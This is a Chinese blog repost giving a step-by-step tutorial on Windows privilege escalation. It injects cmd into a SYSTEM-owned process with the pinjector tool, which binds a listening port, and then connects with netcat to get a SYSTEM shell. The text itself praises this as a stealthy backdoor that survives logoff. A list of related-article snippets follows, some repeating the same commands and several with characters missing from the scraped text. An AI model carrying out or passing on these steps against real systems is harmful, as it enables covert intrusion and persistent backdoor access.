【提权】注入进程提权

最新推荐文章于 2023-06-22 15:03:44 发布
最新推荐文章于 2023-06-22 15:03:44 发布
阅读量639 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: shell
原文链接:http://www.cnblogs.com/NBeveryday/p/6239351.html

注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】

注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。

下面是图文教程。

0x01

从http://www.tarasco.org/security/Process_Injector/  下载pinjector.exe文件。放在windows2003server的c盘根目录。

0x02将压缩包中的pinjector.exe提取出放在c盘根目录。

0x03执行pinjector.exe -l 可查看可以注入的进程。

可以看到不同的进程对应不同PID和用户。

0x04执行pinjector.exe -p 600 cmd 2345   注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。

0x05使用kali的nc 192.168.70.135 2345

反弹shell并提权为system。

 

 

<script>
window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>

 

#####################################################################################################################

总结

将进程注入system服务进程

pinjector.exe进程注入器

http://www.tarasco.org/security/Process_Injector/ {需要FQ下载}

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>    //监听端口。成功后会反弹system的shell。

转载于:https://www.cnblogs.com/NBeveryday/p/6239351.html

C++:进程
HackVibe的博客
08-17 684
进程限是 Windows 程序开发中非常有用的技能,它可以使我们获得更多的控制,执行更多的操作。特别地,我们演示了如何使用 Windows API 函数,以及如何将限的代码封装在一个 C++ 类中。然而,在某些情况下,我们必须进程限,例如需要访问系统资源或执行特操作时。特别地,我们将演示如何使用 Windows API 来进程限,以及如何使用 C++ 语言进行封装,使代码更加易于使用和理解。为了使代码更加易于使用和理解,我们可以将进程限的功能封装在一个 C++ 类中。
Windows 进程限浅谈 -- / 降
最新发布
0x0007 的博客
03-24 4904
在 Windows 上,用户对限并不敏感,可能最为直观的是 UAC ,但相信很多人已经关掉了它的示。但其实安全性早已深入了 Windows 的方方面面。Windows Vista 引入了一个称为强制完整性控制()的新安全结构,类似于 Linux/Unix 中可用的完整性功能。在 Windows Vista 以及后续版本如Windows 11/10和Windows 8/7中,所有安全主体(用户、计算机、服务等)和对象(文件、注册表键、文件夹和资源)都被赋予MIC标签。
进程注入进程
WgpSec狼组安全团队
06-04 1325
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释。如欲转载或传播此文章,必须保证此文章的完整性,包括版声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
进程
`小明湖畔.。のBlog
02-17 1856
HANDLE tokenHandle;//获得令牌句柄BOOL bRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &tokenHandle);if (bRet){TOKEN_PRIVILEGES tokenPri;tokenPri.PrivilegeCount = 1;//tokenPri.Privileges数组的大小
OpenProcessToken等函数的用法
编程爱好者
02-14 1630
GetCurrentProcessID 得到当前进程的ID OpenProcessToken 得到进程的令牌句柄LookupPrivilegeValue 查询进程限 AdjustTokenPrivileges 判断令牌限 要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问的OpenProcess操作,只要当前进程具有SeDeDebug限就可以了。要是一个用户是Admin
android 进程注入,Android 系统漏洞分析
weixin_36329818的博客
05-28 1357
(一) 序言1.1什么是rootRoot——也就是我们这里说的系统,通常是针对Android系统的手机而言,它使得用户可以获取Android操作系统的超级用户限。root通常用于帮助用户越过手机制造商的限制,使得用户可以卸载手机制造商预装在手机中某些应用程序,以及运行一些需要超级用户限的应用程序。Android系统的root与AppleiOS系统的越狱类似。1.2如何实现root一般roo...
Windows进程注入、Unattended Installs
negnegil的博客
09-12 1103
进程注入 使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system注入进程相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现 下载pinjector.exe https://www.tarasco.org/security/Process_Injector/index.html 上传 pinjector.exe到靶机可执行目录 ##列取所有进程 pinje
升-linux手法总结
01-14
- **cron守护进程**:通过编辑cronjob或利用cron守护进程中的漏洞也可能实现。 #### 7. NFS限弱 网络文件系统(NFS)如果配置不当,可能会暴露系统资源,从而成为的途径。 #### 8. Suid和Guid配置错误 ...
工具 pr.exe.zip
12-10
1. **本地**:利用系统或服务中的安全漏洞,例如缓冲区溢出、限配置错误等,来升当前进程限。 2. **限滥用**:通过发现并利用系统中预设但未正确管理的限,比如滥用服务帐户,或者通过弱限的服务...
_Windows 2003 进程注入
草木
11-22 1818
1.首先使用Process Injector进程注入工具,使用命令查看运行进程的PID pinjector.exe -l 这里我们注入进程services.exe,可以看到它是系统限运行的进程,记住的它的PID:356 2.接着使用命令注入刚才记住的进程,监听端口设置为9988 pinjector.exe -p 356 cmd.exe 9988 3.最后我们使用 nc 监听本地9988的端口 使用命令 whoami 可以看到注入成功。 ...
易语言 进程模块
04-28
易语言进程模块易语言进程模块易语言进程模块
之DLL注入
Ms08067安全实验室
03-23 1139
DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果进程中以过多的限运行,那么可以会被攻击者加以利用,以便以DLL文件的...
进程限的方法
Lydia的博客
03-24 1349
三个给进程的方法 方法一: C/C++ code bool EnableDebugPrivilege()    {        HANDLE hToken;        LUID sedebugnameValue;        TOKEN_PRIVILEGES tkp;        if (!OpenProcessToken(GetCurrentProcess(),
技术之给任意进程(我们以OD,CE为例)
a756598009的博客
06-22 1245
赋予进程某种特殊限 也叫升读写限 那么为什么要升读写的限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存读写 这时候就可以使用 升自身辅助进程限 来达到能读写游戏内存的效果那的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程读写 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意读写游戏内存的 游戏的保护也会过滤掉系统进程对自身的读写,
SQL注入-基于MySQL的注入(十七)
Gjqhs的博客
02-22 3949
实验目的 普及结合dll文件对Windows系统进行UDF,掌握UDF的基本思路,熟悉UDF的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 通过某种方式将低限用户升为高限用户的过程。 注入 一般指的是在掌控了某数据库账户的情况下,通过SQL注入等方式升该账户的 限,进而夺得服务器(操作系统)的控制 Windows2003操作系统—一默认用户 System:本地机器上拥有最高限的用户,普通用户管理工具查看不到 Adminis
【Windows进程注入
ssrf
03-04 1688
介绍 获取当前操作系统进程中所拥有的注入进程【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
MFC程序简易操作指南
在Windows操作系统中,进程可能涉及到用户限的变更、访问令牌的修改、以及安全标识符(SID)的获取和应用等。 在文件【压缩包子文件的文件名称列表】中,到的“程序”,可能是文件或文件夹的名称,这里...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值